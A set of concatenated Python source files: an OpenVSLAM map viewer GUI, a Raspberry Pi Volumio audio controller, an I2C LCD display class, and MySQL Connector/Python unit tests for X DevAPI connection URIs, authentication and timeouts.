self.setWindowTitle('Read OpenVSLAM map')
self.mapInfo = MapInfo()
qml_view = QQuickView()
qml_view.rootContext().setContextProperty('mapInfo', self.mapInfo)
qml_view.setSource(QUrl(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'read_map.qml')))
qml_view.setResizeMode(QQuickView.SizeRootObjectToView)
self.qml_gui = qml_view.rootObject()
qml_view_container = QWidget.createWindowContainer(qml_view, self)
qml_view_container.setMinimumSize(800, 200)
self.setCentralWidget(qml_view_container)
self.mapInfo.filenameChanged.connect(self.read_data)
self.mapInfo.visualiseCloud.connect(self.pptk)
self.mapInfo.visualiseTrajectory.connect(self.pyplot)
self.mapInfo.exportCloud.connect(self.export_cloud)
self.data = None
self.cloud = None
self.trajectory = None
def _get_landmarks(self):
landmarks = self.data[b'landmarks'].values()
cloud = np.ndarray([len(landmarks), 3], dtype=np.double)
for i, l in enumerate(landmarks):
cloud[i, :] = np.array(l[b'pos_w'])
self.cloud = _change_frame(cloud)
self.cloud_colour = np.repeat([[0.7, 0.7, 0.7]], cloud.shape[0], axis=0)
self.mapInfo.keypointCount = cloud.shape[0]
def _get_trajectory(self):
keyframes = self.data[b'keyframes']
keyframes = {ki: keyframes[b'%d' % ki] for ki in sorted([int(k) for k in keyframes.keys()])}
trajectory = np.ndarray([len(keyframes), 3], dtype=np.double)
for i, (k, f) in enumerate(keyframes.items()):
transform = -sst.Rotation.from_quat(f[b'rot_cw']).as_dcm().transpose()
trajectory[i, :] = np.matmul(transform, f[b'trans_cw'])
n = trajectory.shape[0]
self.mapInfo.keyframeCount = n
self.trajectory = _change_frame(trajectory)
self.trajectory_colour = np.array([[1 - x / n, 0.0, x / n] for x in range(1, n + 1)])
def read_data(self):
def thread_function():
with open(self.mapInfo.filename, 'rb') as f:
self.data = msgpack.unpack(f)
self._get_landmarks()
self._get_trajectory()
self.mapInfo.loading = False
thread = Thread(target=thread_function)
self.mapInfo.loading = True
thread.start()
def export_cloud(self, filename):
Thread(target=lambda: np.savetxt(filename.replace('file://', ''), self.cloud, delimiter=',')).start()
def open3d(self):
if not self.data:
return
pcd = o3d.geometry.PointCloud()
pcd.points = o3d.utility.Vector3dVector(np.concatenate((self.cloud, self.trajectory), axis=0))
pcd.colors = o3d.utility.Vector3dVector(np.concatenate((self.cloud_colour, self.trajectory_colour), axis=0))
o3d.visualization.draw_geometries([pcd])
def pyplot(self):
if not self.data:
return
fig = plt.figure()
ax = plt3d.Axes3D(fig)
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
ax.scatter(self.trajectory[:, 0], self.trajectory[:, 1], self.trajectory[:, 2])
vrange = [np.min(self.trajectory), np.max(self.trajectory)]
ax.auto_scale_xyz(vrange, vrange, vrange)
plt.show()
def pptk(self):
if not self.data:
return
v = pptk.viewer(np.concatenate((self.cloud, self.trajectory), axis=0))
v.attributes(np.concatenate((self.cloud_colour, self.trajectory_colour), axis=0))
v.set(lookat=np.mean(self.cloud, axis=0), point_size=0.005)
if __name__ == '__main__':
application = QtWidgets.QApplication(sys.argv)
window = MainWindow()
window.show()
sys.exit(application.exec_())
|
Old_AudioSupervisor.py | #!/usr/bin/python
from __future__ import unicode_literals
import json, sys
from socketIO_client import SocketIO
from time import time, sleep
from threading import Thread
from hardware import *
from modules.logger import *
import RPi.GPIO as GPIO
GPIO.setmode(GPIO.BCM)
log = Log(LOGLEVEL.INFO)
volumio_host = 'localhost'
volumio_port = 3000
VOLUME_DT = 5 # volume adjustment step
volumioIO = SocketIO(volumio_host, volumio_port)
STATE_NONE = -1
STATE_PLAYER = 0
STATE_PLAYLIST_MENU = 1
STATE_QUEUE_MENU = 2
STATE_VOLUME = 3
STATE_SHOW_INFO = 4
STATE_LIBRARY_MENU = 5
STATE_CLOCK = 6
DSP.state = STATE_NONE
DSP.stateTimeout = 0
DSP.timeOutRunning = True
DSP.activeSong = 'AMPI'
DSP.activeArtist = 'VOLUMIO'
DSP.playState = 'unknown'
DSP.playPosition = 0
DSP.ptime = 0
DSP.duration = 0
DSP.modal = False
DSP.playlistoptions = []
DSP.queue = []
DSP.libraryFull = []
DSP.libraryNames = []
DSP.volume = 0
DSP.source = None
emit_volume = False
emit_track = False
def LoadPlaylist(playlistname):
log.info("loading playlist: " + playlistname.encode('ascii', 'ignore'))
DSP.playPosition = 0
volumioIO.emit('playPlaylist', {'name': playlistname})
DSP.state = STATE_PLAYER
def onPushState(data):
newStatus = None
if 'trackType' in data:
s = data['trackType']
if s != DSP.source:
log.info("New source: " + str(s))
DSP.source = s
if 'title' in data:
newSong = data['title']
else:
newSong = ''
if newSong is None:
newSong = ''
if 'artist' in data:
newArtist = data['artist']
else:
newArtist = ''
if newArtist is None: # volumio can push NoneType
newArtist = ''
if 'position' in data: # current position in queue
DSP.playPosition = data['position'] # didn't work well with volumio ver. < 2.5
if 'status' in data:
newStatus = data['status']
if 'seek' in data:
DSP.ptime = data['seek']
NowPlayingScreen.ptime = DSP.ptime
if 'duration' in data:
DSP.duration = data['duration']
if DSP.state != STATE_VOLUME: # get volume on startup and remote control
try: # it is either number or unicode text
DSP.volume = int(data['volume'])
except (KeyError, ValueError):
pass
if 'disableVolumeControl' in data:
DSP.volumeControlDisabled = data['disableVolumeControl']
if (newSong != DSP.activeSong): # new song
log.info("New Song: " + "\033[94m" + newSong.encode('ascii', 'ignore') + "\033[0m")
DSP.activeSong = newSong
DSP.activeArtist = newArtist
if DSP.state == STATE_PLAYER and newStatus != 'stop':
DSP.modal.UpdatePlayingInfo(newArtist, newSong)
if newStatus != DSP.playState:
DSP.playState = newStatus
if DSP.state == STATE_PLAYER:
if DSP.playState == 'play':
iconTime = 35
else:
iconTime = 80
DSP.modal.SetPlayingIcon(DSP.playState, iconTime)
def onPushQueue(data):
DSP.queue = [track['name'] if 'name' in track else 'no track' for track in data]
log.info('Queue length is ' + str(len(DSP.queue)))
def onPushBrowseSources(data):
log.info('Browse sources:')
for item in data:
log.blue(item['uri'])
def onLibraryBrowse(data):
DSP.libraryFull = data
itemList = DSP.libraryFull['navigation']['lists'][0]['items']
DSP.libraryNames = [item['title'] if 'title' in item else 'empty' for item in itemList]
DSP.state = STATE_LIBRARY_MENU
def EnterLibraryItem(itemNo):
selectedItem = DSP.libraryFull['navigation']['lists'][0]['items'][itemNo]
log.info("Entering library item: " + DSP.libraryNames[itemNo].encode('ascii', 'ignore'))
if selectedItem['type'][-8:] == 'category' or selectedItem['type'] == 'folder':
volumioIO.emit('browseLibrary', {'uri': selectedItem['uri']})
else:
log.info("Sending new Queue")
volumioIO.emit('clearQueue') # clear queue and add whole list of items
DSP.queue = []
volumioIO.emit('addToQueue', DSP.libraryFull['navigation']['lists'][0]['items'])
DSP.stateTimeout = 5.0 # maximum time to load new queue
while len(DSP.queue) == 0 and DSP.stateTimeout > 0.1:
sleep(0.1)
DSP.stateTimeout = 0.2
log.info("Play position = " + str(itemNo))
volumioIO.emit('play', {'value': itemNo})
def LibraryReturn(): # go to parent category
if not 'prev' in DSP.libraryFull['navigation']:
DSP.state = STATE_PLAYER
else:
parentCategory = DSP.libraryFull['navigation']['prev']['uri']
log.info("Navigating to parent category in library: " + parentCategory.encode('ascii', 'ignore'))
if parentCategory != '' and parentCategory != '/':
volumioIO.emit('browseLibrary', {'uri': parentCategory})
else:
DSP.state= STATE_PLAYER
def onPushListPlaylist(data):
global DSP
if len(data) > 0:
DSP.playlistoptions = data
"""
Startup initializer
"""
def _receive_thread():
volumioIO.wait()
receive_thread = Thread(target=_receive_thread, name="Receiver")
receive_thread.daemon = True
volumioIO.on('pushState', onPushState)
volumioIO.on('pushListPlaylist', onPushListPlaylist)
volumioIO.on('pushQueue', onPushQueue)
volumioIO.on('pushBrowseSources', onPushBrowseSources)
# volumioIO.on('pushBrowseLibrary', onLibraryBrowse)
# get list of Playlists and initial state
volumioIO.emit('listPlaylist')
volumioIO.emit('getState')
volumioIO.emit('getQueue')
#volumioIO.emit('getBrowseSources')
sleep(0.1)
try:
with open('DSPconfig.json', 'r') as f: # load last playing track number
config = json.load(f)
except IOError:
pass
else:
DSP.playPosition = config['track']
receive_thread.start()
def main():
global emit_volume, emit_track
while True:
if emit_volume:
emit_volume = False
log.info("Volume: " + str(DSP.volume))
volumioIO.emit('volume', DSP.volume)
DSP.state=STATE_VOLUME
DSP.stateTimeout = 0.01
if emit_track and DSP.stateTimeout < 4.5:
emit_track = False
try:
log.info('Track selected: ' + str(DSP.playPosition + 1) + '/' + str(len(DSP.queue)) + ' ' + DSP.queue[
DSP.playPosition].encode('ascii', 'ignore'))
except IndexError:
pass
volumioIO.emit('play', {'value': DSP.playPosition})
def defer():
try:
receive_thread.join(1)
DSP.cleanup()
log.info("System exit ok")
except Exception as err:
log.err("Defer Error: " + str(err))
if __name__ == '__main__':
try:
main()
except(KeyboardInterrupt, SystemExit):
defer() # todo make work!
|
lcd.py | from rpi_lcd import LCD as RPI_LCD
import math
import threading
import time
import unicodedata
import queue
class LCD(RPI_LCD):
def __init__(self, address=0x27, bus=1, width=20, rows=4):
self.playing = False
self.text_queue = queue.Queue()
threading.Thread(target=self.text_queue_worker, daemon=True).start()
if not address is None:
super(LCD, self).__init__(address, bus, width, rows)
else:
self.address = None
def text_queue_worker(self):
while True:
item = self.text_queue.get()
super().text(item[0], item[1], item[2])
self.text_queue.task_done()
def write(self, byte, mode=0):
if not self.address is None:
super().write(byte, mode)
def scroll_text(self, text, line, align='left'):
scrolling_text = text + ' ' * round(self.width/2) + text
text_length = len(text)
first_letter = 0
while self.playing:
last_letter = first_letter + self.width
self.text_queue.put([scrolling_text[first_letter:last_letter], line, align])
time.sleep(0.5)
first_letter = (first_letter + 1) % (text_length + round(self.width/2))
def strip_accents(self, text):
return ''.join(c for c in unicodedata.normalize('NFKD', text) if unicodedata.category(c) != 'Mn')
def text(self, text, line, align='left'):
if not self.address is None:
self.playing = True
normalized_text = self.strip_accents(text)
if len(normalized_text) > self.width:
scroll_text = threading.Thread(target=self.scroll_text, name='Scroll Text', args=[normalized_text, line, align], daemon=True)
scroll_text.start();
else:
self.text_queue.put([text, line, align])
def get_time_string(self, time):
minutes = math.floor(time / 60)
seconds = time % 60
return f'{str(minutes).zfill(2)}:{str(seconds).zfill(2)}'
def timer(self, max_time, line, align):
current_time = 0
max_time_string = self.get_time_string(max_time)
self.playing = True
while current_time < max_time and self.playing:
current_time_string = self.get_time_string(current_time)
timer_string = current_time_string + ' / ' + max_time_string
self.text_queue.put([timer_string, line, align])
time.sleep(1)
current_time +=1
def display_timer(self, max_time, line, align='left'):
if not self.address is None:
timer = threading.Thread(target=self.timer, name='Timer', args=[max_time, line, align], daemon=True)
timer.start();
def get_text_line(self, text):
if not self.address is None:
return super().get_text_line(text)
return ''
def clear(self):
self.playing = False
if self.address:
super().clear() |
test_mysqlx_connection.py | # -*- coding: utf-8 -*-
# Copyright (c) 2016, 2019, Oracle and/or its affiliates. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0, as
# published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an
# additional permission to link the program and your derivative works
# with the separately licensed software that they have included with
# MySQL.
#
# Without limiting anything contained in the foregoing, this file,
# which is part of MySQL Connector/Python, is also subject to the
# Universal FOSS Exception, version 1.0, a copy of which can be found at
# http://oss.oracle.com/licenses/universal-foss-exception.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Unittests for mysqlx.connection
"""
import logging
import os
import platform
import unittest
import sys
import tests
import time
import socket
import struct
import mysqlx
from threading import Thread
from time import sleep
from mysqlx.connection import SocketStream
from mysqlx.compat import STRING_TYPES
from mysqlx.errors import InterfaceError, OperationalError, ProgrammingError
from mysqlx.protocol import Message, MessageReaderWriter, Protocol
from mysqlx.protobuf import HAVE_MYSQLXPB_CEXT, mysqlxpb_enum, Protobuf
from mysql.connector.utils import linux_distribution
from mysql.connector.version import VERSION, LICENSE
if mysqlx.compat.PY3:
from urllib.parse import quote_plus, quote
else:
from urllib import quote_plus, quote
from .test_mysqlx_crud import drop_table
LOGGER = logging.getLogger(tests.LOGGER_NAME)
_URI_TEST_RESULTS = ( # (uri, result)
("127.0.0.1", None),
("localhost", None),
("domain.com", None),
("user:password@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"password": "password", "port": 33060,
"user": "user"}),
("user:password@127.0.0.1:33061", {"schema": "", "host": "127.0.0.1",
"password": "password", "port": 33061,
"user": "user"}),
("user:@127.0.0.1", {"schema": "", "host": "127.0.0.1", "password": "",
"port": 33060, "user": "user"}),
("user:@127.0.0.1/schema", {"schema": "schema", "host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user"}),
("user:@127.0.0.1/schema?use_pure=true", {"schema": "schema",
"host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user",
"use-pure": True}),
("user{0}:password{0}@127.0.0.1/schema?use_pure=true"
"".format(quote("?!@#$%/:")), {"schema": "schema", "host": "127.0.0.1",
"port": 33060, "user": "user?!@#$%/:",
"password": "password?!@#$%/:",
"use-pure": True}),
("mysqlx://user:@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"password": "", "port": 33060,
"user": "user"}),
("mysqlx://user:@127.0.0.1:33060/schema",
{"schema": "schema", "host": "127.0.0.1", "password": "", "port": 33060,
"user": "user"}),
("mysqlx://user@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1", None),
("mysqlx://user:password@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1",
{"schema": "", "host": "2001:db8:85a3:8d3:1319:8a2e:370:7348",
"password": "password", "port": 1, "user": "user"}),
("mysqlx://user:password@[2001:db8:85a3:8d3:1319:8a2e:370:7348]:1/schema",
{"schema": "schema", "host": "2001:db8:85a3:8d3:1319:8a2e:370:7348",
"password": "password", "port": 1, "user": "user"}),
("รกรฉ'รญ'รณรบ:unicode@127.0.0.1",
{"schema": "", "host": "127.0.0.1", "password": "unicode",
"port": 33060, "user": "รกรฉ'รญ'รณรบ"}),
("unicode:รกรฉ'รญ'รณรบ@127.0.0.1",
{"schema": "", "host": "127.0.0.1", "password": "รกรฉ'รญ'รณรบ",
"port": 33060, "user": "unicode"}),
("root:@[localhost, 127.0.0.1:88, [::]:99, [a1:b1::]]",
{"routers": [{"host": "localhost", "port": 33060},
{"host": "127.0.0.1", "port": 88},
{"host": "::", "port": 99},
{"host": "a1:b1::", "port": 33060}],
"user": "root", "password": "", "schema": ""}),
("root:@[a1:a2:a3:a4:a5:a6:a7:a8]]",
{"host": "a1:a2:a3:a4:a5:a6:a7:a8", "schema": "",
"port": 33060, "user": "root", "password": ""}),
("root:@localhost", {"user": "root", "password": "",
"host": "localhost", "port": 33060, "schema": ""}),
("root:@[a1:b1::]", {"user": "root", "password": "",
"host": "a1:b1::", "port": 33060, "schema": ""}),
("root:@[a1:b1::]:88", {"user": "root", "password": "",
"host": "a1:b1::", "port": 88, "schema": ""}),
("root:@[[a1:b1::]:88]", {"user": "root", "password": "",
"routers": [{"host": "a1:b1::", "port":88}], "schema": ""}),
("root:@[(address=localhost:99, priority=99)]",
{"user": "root", "password": "", "schema": "",
"routers": [{"host": "localhost", "port": 99, "priority": 99}]})
)
_ROUTER_LIST_RESULTS = ( # (uri, result)
("รกรฉ'รญ'รณรบ:unicode@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"port": 33060, "password": "unicode", "user": "รกรฉ'รญ'รณรบ"}),
("unicode:รกรฉ'รญ'รณรบ@127.0.0.1", {"schema": "", "host": "127.0.0.1",
"port": 33060, "password": "รกรฉ'รญ'รณรบ", "user": "unicode"}),
("user:password@[127.0.0.1, localhost]", {"schema": "", "routers":
[{"host": "127.0.0.1", "port": 33060}, {"host": "localhost", "port":
33060}], "password": "password", "user": "user"}),
("user:password@[(address=127.0.0.1, priority=99), (address=localhost,"
"priority=98)]", {"schema": "", "routers": [{"host": "127.0.0.1",
"port": 33060, "priority": 99}, {"host": "localhost", "port": 33060,
"priority": 98}], "password": "password", "user": "user"}),
)
_PREP_STMT_QUERY = (
"SELECT p.sql_text, p.count_execute "
"FROM performance_schema.prepared_statements_instances AS p "
"JOIN performance_schema.threads AS t ON p.owner_thread_id = t.thread_id "
"AND t.processlist_id = @@pseudo_thread_id")
def file_uri(path, brackets=True):
if brackets:
return "{0}{1}".format(path[0], quote_plus(path[1:]))
return "({0})".format(path)
def build_uri(**kwargs):
uri = "mysqlx://{0}:{1}".format(kwargs["user"], kwargs["password"])
if "host" in kwargs:
host = "[{0}]".format(kwargs["host"]) \
if ":" in kwargs["host"] else kwargs["host"]
uri = "{0}@{1}".format(uri, host)
elif "routers" in kwargs:
routers = []
for router in kwargs["routers"]:
fmt = "(address={host}{port}, priority={priority})" \
if "priority" in router else "{host}{port}"
host = "[{0}]".format(router["host"]) if ":" in router["host"] \
else router["host"]
port = ":{0}".format(router["port"]) if "port" in router else ""
routers.append(fmt.format(host=host, port=port,
priority=router.get("priority", None)))
uri = "{0}@[{1}]".format(uri, ",".join(routers))
else:
raise ProgrammingError("host or routers required.")
if "port" in kwargs:
uri = "{0}:{1}".format(uri, kwargs["port"])
if "schema" in kwargs:
uri = "{0}/{1}".format(uri, kwargs["schema"])
query = []
if "ssl_mode" in kwargs:
query.append("ssl-mode={0}".format(kwargs["ssl_mode"]))
if "ssl_ca" in kwargs:
query.append("ssl-ca={0}".format(kwargs["ssl_ca"]))
if "ssl_cert" in kwargs:
query.append("ssl-cert={0}".format(kwargs["ssl_cert"]))
if "ssl_key" in kwargs:
query.append("ssl-key={0}".format(kwargs["ssl_key"]))
if "use_pure" in kwargs:
query.append("use-pure={0}".format(kwargs["use_pure"]))
if "connect_timeout" in kwargs:
query.append("connect-timeout={0}".format(kwargs["connect_timeout"]))
if "connection_attributes" in kwargs:
conn_attrs = kwargs["connection_attributes"]
if isinstance(conn_attrs, STRING_TYPES) and \
not (conn_attrs.startswith("[") and conn_attrs.endswith("[")):
query.append("connection-attributes={}"
"".format(kwargs["connection_attributes"]))
else:
attr_list = []
for key in conn_attrs:
attr_list.append("{}={}".format(key, conn_attrs[key]))
query.append("connection-attributes={0}"
"".format("[{}]".format(",".join(attr_list))))
if len(query) > 0:
uri = "{0}?{1}".format(uri, "&".join(query))
return uri
class ServerSocketStream(SocketStream):
def __init__(self):
self._socket = None
def start_receive(self, host, port):
"""Opens a sokect to comunicate to the given host, port
Args:
host (str): host name.
port (int): host port.
Returns:
address of the communication channel
"""
my_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
my_sock.bind((host, port))
# Starting receiving...
if sys.version_info > (3, 5):
my_sock.listen()
else:
my_sock.listen(1)
self._socket, addr = my_sock.accept()
return addr
class ServerProtocol(Protocol):
def __init__(self, reader_writer):
super(ServerProtocol, self).__init__(reader_writer)
def send_auth_continue_server(self, auth_data):
"""Send Server authenticate continue.
Args:
auth_data (str): Authentication data.
"""
msg = Message("Mysqlx.Session.AuthenticateContinue",
auth_data=auth_data)
self._writer.write_message(mysqlxpb_enum(
"Mysqlx.ServerMessages.Type.SESS_AUTHENTICATE_CONTINUE"), msg)
def send_auth_ok(self):
"""Send authenticate OK.
"""
msg = Message("Mysqlx.Session.AuthenticateOk")
self._writer.write_message(mysqlxpb_enum(
"Mysqlx.ServerMessages.Type.SESS_AUTHENTICATE_OK"), msg)
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 12), "XPlugin not compatible")
class MySQLxSessionTests(tests.MySQLxTests):
def setUp(self):
self.connect_kwargs = tests.get_mysqlx_config()
self.schema_name = self.connect_kwargs["schema"]
try:
self.session = mysqlx.get_session(self.connect_kwargs)
except mysqlx.Error as err:
self.fail("{0}".format(err))
if os.name == "nt":
if "64" in platform.architecture()[0]:
self.platform_arch = "x86_64"
elif "32" in platform.architecture()[0]:
self.platform_arch = "i386"
else:
self.platform_arch = platform.architecture()
self.os_ver = "Windows-{}".format(platform.win32_ver()[1])
else:
self.platform_arch = platform.machine()
if platform.system() == "Darwin":
self.os_ver = "{}-{}".format("macOS", platform.mac_ver()[0])
else:
self.os_ver = "-".join(linux_distribution()[0:2])
license_chunks = LICENSE.split(" ")
if license_chunks[0] == "GPLv2":
self.client_license = "GPL-2.0"
else:
self.client_license = "Commercial"
def test___init__(self):
bad_config = {
"host": "bad_host",
"port": "",
"username": "root",
"password": ""
}
self.assertRaises(InterfaceError, mysqlx.Session, bad_config)
host = self.connect_kwargs["host"]
port = self.connect_kwargs["port"]
user = self.connect_kwargs["user"]
password = self.connect_kwargs["password"]
# Session to a farm using one of many routers (prios)
# Loop during connect because of network error (succeed)
routers = [{"host": "bad_host","priority": 100},
{"host": host, "port": port, "priority": 98}]
uri = build_uri(user=user, password=password, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Session to a farm using one of many routers (incomplete prios)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port}]
uri = build_uri(user=user, password=password, routers=routers)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except ProgrammingError as err:
self.assertEqual(4000, err.errno)
# Session to a farm using invalid priorities (out of range)
routers = [{"host": "bad_host", "priority": 100},
{"host": host, "port": port, "priority": 101}]
uri = build_uri(user=user, password=password, routers=routers)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except ProgrammingError as err:
self.assertEqual(4007, err.errno)
# Establish an Session to a farm using one of many routers (no prios)
routers = [{"host": "bad_host"}, {"host": host, "port": port}]
uri = build_uri(user=user, password=password, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Break loop during connect (non-network error)
uri = build_uri(user=user, password="bad_pass", routers=routers)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
# Break loop during connect (none left)
uri = "mysqlx://{0}:{1}@[bad_host, another_bad_host]".format(user, password)
self.assertRaises(InterfaceError, mysqlx.get_session, uri)
try:
session = mysqlx.get_session(uri)
except InterfaceError as err:
self.assertEqual(4001, err.errno)
# Invalid option with URI
uri = "mysqlx://{0}:{1}@{2}:{3}?invalid=option" \
"".format(user, password, host, port)
self.assertRaises(ProgrammingError, mysqlx.get_session, uri)
# Invalid option with dict
config = {
"user": user,
"password": password,
"host": host,
"port": port,
"invalid": "option"
}
self.assertRaises(ProgrammingError, mysqlx.get_session, config)
# Invalid option with kwargs
self.assertRaises(ProgrammingError, mysqlx.get_session, **config)
# SocketSteam.is_socket()
session = mysqlx.get_session(user=user, password=password,
host=host, port=port)
self.assertFalse(session._connection.stream.is_socket())
def test_auth(self):
sess = mysqlx.get_session(self.connect_kwargs)
sess.sql("CREATE USER 'native'@'%' IDENTIFIED WITH "
"mysql_native_password BY 'test'").execute()
sess.sql("CREATE USER 'sha256'@'%' IDENTIFIED WITH "
"sha256_password BY 'sha256'").execute()
config = {'host': self.connect_kwargs['host'],
'port': self.connect_kwargs['port']}
config['user'] = 'native'
config['password'] = 'test'
config['auth'] = 'plain'
mysqlx.get_session(config)
config['auth'] = 'mysql41'
mysqlx.get_session(config)
config['user'] = 'sha256'
config['password'] = 'sha256'
if tests.MYSQL_VERSION >= (8, 0, 1):
config['auth'] = 'plain'
mysqlx.get_session(config)
config['auth'] = 'mysql41'
self.assertRaises(InterfaceError, mysqlx.get_session, config)
sess.sql("DROP USER 'native'@'%'").execute()
sess.sql("DROP USER 'sha256'@'%'").execute()
sess.close()
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 5),
"SHA256_MEMORY authentation mechanism not available")
def test_auth_sha265_memory(self):
sess = mysqlx.get_session(self.connect_kwargs)
sess.sql("CREATE USER 'caching'@'%' IDENTIFIED WITH "
"caching_sha2_password BY 'caching'").execute()
config = {
"user": "caching",
"password": "caching",
"host": self.connect_kwargs["host"],
"port": self.connect_kwargs["port"]
}
# Session creation is not possible with SSL disabled
config["ssl-mode"] = mysqlx.SSLMode.DISABLED
self.assertRaises(InterfaceError, mysqlx.get_session, config)
config["auth"] = mysqlx.Auth.SHA256_MEMORY
self.assertRaises(InterfaceError, mysqlx.get_session, config)
# Session creation is possible with SSL enabled
config["ssl-mode"] = mysqlx.SSLMode.REQUIRED
config["auth"] = mysqlx.Auth.PLAIN
mysqlx.get_session(config)
# Disable SSL
config["ssl-mode"] = mysqlx.SSLMode.DISABLED
# Password is in cache will, session creation is possible
config["auth"] = mysqlx.Auth.SHA256_MEMORY
mysqlx.get_session(config)
sess.sql("DROP USER 'caching'@'%'").execute()
sess.close()
@unittest.skipIf(tests.MYSQL_VERSION < (5, 7, 15), "--mysqlx-socket option"
" tests not available for this MySQL version")
@unittest.skipIf(os.name == 'nt', "sockets not available"
" on windows")
def test_mysqlx_socket(self):
# Connect with unix socket
uri = "mysqlx://{user}:{password}@({socket})".format(
user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
socket=self.connect_kwargs["socket"])
session = mysqlx.get_session(uri)
# No SSL with Unix Sockets
res = mysqlx.statement.SqlStatement(session._connection,
"SHOW STATUS LIKE 'Mysqlx_ssl_active'").execute().fetch_all()
self.assertEqual("OFF", res[0][1])
session.close()
# Socket parsing tests
conn = mysqlx._get_connection_settings("root:@(/path/to/sock)")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@(/path/to/sock)/schema")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
conn = mysqlx._get_connection_settings("root:@/path%2Fto%2Fsock")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@/path%2Fto%2Fsock/schema")
self.assertEqual("/path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
conn = mysqlx._get_connection_settings("root:@.%2Fpath%2Fto%2Fsock")
self.assertEqual("./path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@.%2Fpath%2Fto%2Fsock"
"/schema")
self.assertEqual("./path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
conn = mysqlx._get_connection_settings("root:@..%2Fpath%2Fto%2Fsock")
self.assertEqual("../path/to/sock", conn["socket"])
self.assertEqual("", conn["schema"])
conn = mysqlx._get_connection_settings("root:@..%2Fpath%2Fto%2Fsock"
"/schema")
self.assertEqual("../path/to/sock", conn["socket"])
self.assertEqual("schema", conn["schema"])
@unittest.skipIf(HAVE_MYSQLXPB_CEXT == False, "C Extension not available")
def test_connection_uri(self):
uri = build_uri(user=self.connect_kwargs["user"],
password=self.connect_kwargs["password"],
host=self.connect_kwargs["host"],
port=self.connect_kwargs["port"],
schema=self.connect_kwargs["schema"],
use_pure=False)
session = mysqlx.get_session(uri)
self.assertIsInstance(session, mysqlx.Session)
# Test URI parser function
for uri, res in _URI_TEST_RESULTS:
try:
settings = mysqlx._get_connection_settings(uri)
self.assertEqual(res, settings)
except mysqlx.Error:
self.assertEqual(res, None)
# Test URI parser function
for uri, res in _ROUTER_LIST_RESULTS:
try:
settings = mysqlx._get_connection_settings(uri)
self.assertEqual(res, settings)
except mysqlx.Error:
self.assertEqual(res, None)
@unittest.skipIf(tests.MYSQL_VERSION < (8, 0, 13),
"MySQL 8.0.13+ is required for connect timeout")
def test_connect_timeout(self):
config = self.connect_kwargs.copy()
# 0 ms disables timouts on socket connections
config["connect-timeout"] = 0
session = mysqlx.get_session(config)
session.close()
# 10000 ms should be time enough to connect
config["connect-timeout"] = 10000
session = mysqlx.get_session(config)
session.close()
# Use connect timeout in URI
session = mysqlx.get_session(build_uri(**config))
session.close()
# Timeout for an unreachable host
# https://en.wikipedia.org/wiki/IPv4#Special-use_addresses
hosts = [
"198.51.100.255",
"192.0.2.255",
"10.255.255.1",
"192.0.2.0",
"203.0.113.255",
"10.255.255.255",
"192.168.255.255",
"203.0.113.4",
"192.168.0.0",
"172.16.0.0",
"10.255.255.251",
"172.31.255.255",
"198.51.100.23",
"172.16.255.255",
"198.51.100.8",
"192.0.2.254",
]
unreach_hosts = []
config["connect-timeout"] = 2000
# Find two unreachable hosts for testing
for host in hosts:
try:
config["host"] = host
mysqlx.get_session(config)
except mysqlx.TimeoutError:
unreach_hosts.append(host)
if len(unreach_hosts) == 2:
break # We just need 2 unreachable hosts
except:
pass
total_unreach_hosts = len(unreach_hosts)
self.assertEqual(total_unreach_hosts, 2,
"Two unreachable hosts are needed, {0} found"
"".format(total_unreach_hosts))
# Multi-host scenarios
# Connect to a secondary host if the primary fails
routers = [
{"host": unreach_hosts[0], "port": config["port"], "priority": 100},
{"host": "127.0.0.1", "port": config["port"], "priority": 90}
]
uri = build_uri(user=config["user"], password=config["password"],
connect_timeout=2000, routers=routers)
session = mysqlx.get_session(uri)
session.close()
# Fail to connect to all hosts
routers = [
{"host": unreach_hosts[0], "port": config["port"], "priority": 100},
{"host": unreach_hosts[1], "port": config["port"], "priority": 90}
]
uri = build_uri(user=config["user"], password=config["password"],
connect_timeout=2000, routers=routers)
try:
mysqlx.get_session(uri)
self.fail("It should not connect to any unreachable host")
except mysqlx.TimeoutError as err:
self.assertEqual(err.msg,
"All server connection attempts were aborted. "
"Timeout of 2000 ms was exceeded for each "
"selected server")
except mysqlx.InterfaceError as err:
self.assertEqual(err.msg, "Failed to connect to any of the routers")
# Trying to establish a connection with a wrong password should not
# wait for timeout
